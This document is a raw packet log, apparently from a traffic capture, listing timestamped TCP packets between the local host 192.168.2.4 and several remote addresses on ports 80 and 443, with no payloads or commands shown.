Nov 7, 2024 07:33:24.579067945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579080105 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579090118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579096079 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579101086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579112053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579124928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579128027 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579138041 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579147100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579149961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579158068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579163074 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579168081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579178095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.579191923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579226971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.579818010 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.579860926 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.579865932 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.579876900 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.579916954 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.579930067 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.580477953 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.580523968 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.580529928 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.584867001 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.584914923 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.584920883 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.592947006 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.592958927 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.593835115 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.593880892 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.593887091 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.602528095 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.602571011 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.602577925 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.611361027 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.611412048 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.611418009 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.612452984 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612489939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612502098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612509012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612524986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612545013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612644911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612657070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612670898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612684011 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612695932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612737894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612903118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612914085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612925053 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.612952948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.612963915 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.613028049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613039970 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613049030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613080025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.613095999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.613162994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613173962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613185883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.613214016 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.613236904 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.619940042 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.619990110 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.619995117 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.620738029 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.624420881 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.624429941 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.624775887 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.625638008 CET	49891	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.625646114 CET	443	49891	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.628741980 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.629683018 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.629689932 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.635747910 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.635889053 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.638315916 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.638391972 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.638397932 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.655275106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.655320883 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.655333042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.655345917 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.655368090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.655385971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.694505930 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694586039 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.694592953 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694689035 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694720030 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694744110 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.694751024 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694801092 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.694850922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.694864988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.694875956 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.694881916 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.694895029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.694926023 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695179939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695190907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695200920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695213079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695218086 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695225000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695234060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695235014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695252895 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695286036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695569038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695580006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695590019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695600986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695610046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695612907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695622921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695628881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695635080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695645094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695656061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695657969 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695667982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.695703983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.695718050 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696217060 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696229935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696239948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696249962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696257114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696260929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696269989 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696279049 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696279049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696289062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696299076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696310043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696311951 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696337938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696355104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696820974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696834087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696845055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696850061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696860075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696870089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696872950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696882963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696897030 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696916103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696928024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696938038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696947098 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696949005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696959019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.696964025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696985960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.696996927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697767973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697779894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697798014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697809935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697819948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697825909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697833061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697843075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697853088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697854996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697866917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697879076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697884083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697890043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697901964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697901964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697911024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.697938919 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.697951078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698702097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698715925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698725939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698738098 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698750019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698761940 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698761940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698772907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698784113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698787928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698793888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698803902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698815107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698827028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698827028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698837996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698848009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698848963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698858976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698870897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.698873043 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698895931 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.698915005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.699623108 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699634075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699644089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699650049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699655056 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699666977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699678898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699690104 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699693918 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.699700117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699711084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699722052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.699734926 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.699755907 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.699779034 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.699806929 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.699816942 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.699821949 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.699950933 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.699956894 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.701673031 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.701745033 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.701750040 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.703825951 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.703988075 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.703994989 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.708132982 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:24.710568905 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.710642099 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.710649014 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.716737986 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.716887951 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.716893911 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.722690105 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.722762108 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.722768068 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.728739023 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.728812933 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.728818893 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.731745958 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.731772900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.731785059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.731825113 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.731847048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.731970072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732018948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732059002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732069016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732105970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732173920 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732189894 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732201099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732220888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732234001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732358932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732369900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732378960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732391119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732398033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732422113 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732446909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732692003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732702017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732711077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732723951 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732734919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732743979 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732757092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732786894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732888937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732901096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732913017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.732940912 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.732969999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.735111952 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.735167027 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.735172987 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.740673065 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.740870953 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.740876913 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.747023106 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.747178078 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.747183084 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.752856016 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.752903938 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.752909899 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.755333900 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:24.758830070 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.758924961 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.758933067 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.761460066 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.765089035 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.765217066 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.765222073 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.771200895 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.771251917 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.771258116 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.774796009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.774851084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.774868965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.774913073 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.776907921 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.777045012 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.777050972 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.783000946 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.783046007 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.783052921 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811296940 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811322927 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811346054 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.811352968 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811402082 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.811408043 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811597109 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.811641932 CET	49888	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:24.811646938 CET	443	49888	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:24.813857079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.813898087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.813930035 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.813937902 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.813960075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.813966036 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814029932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814042091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814054012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814066887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814078093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814097881 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814285994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814296961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814306974 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814321041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814335108 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814353943 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.814539909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.814551115 CET	80	49882	185.215.113.16	192.168.2.4
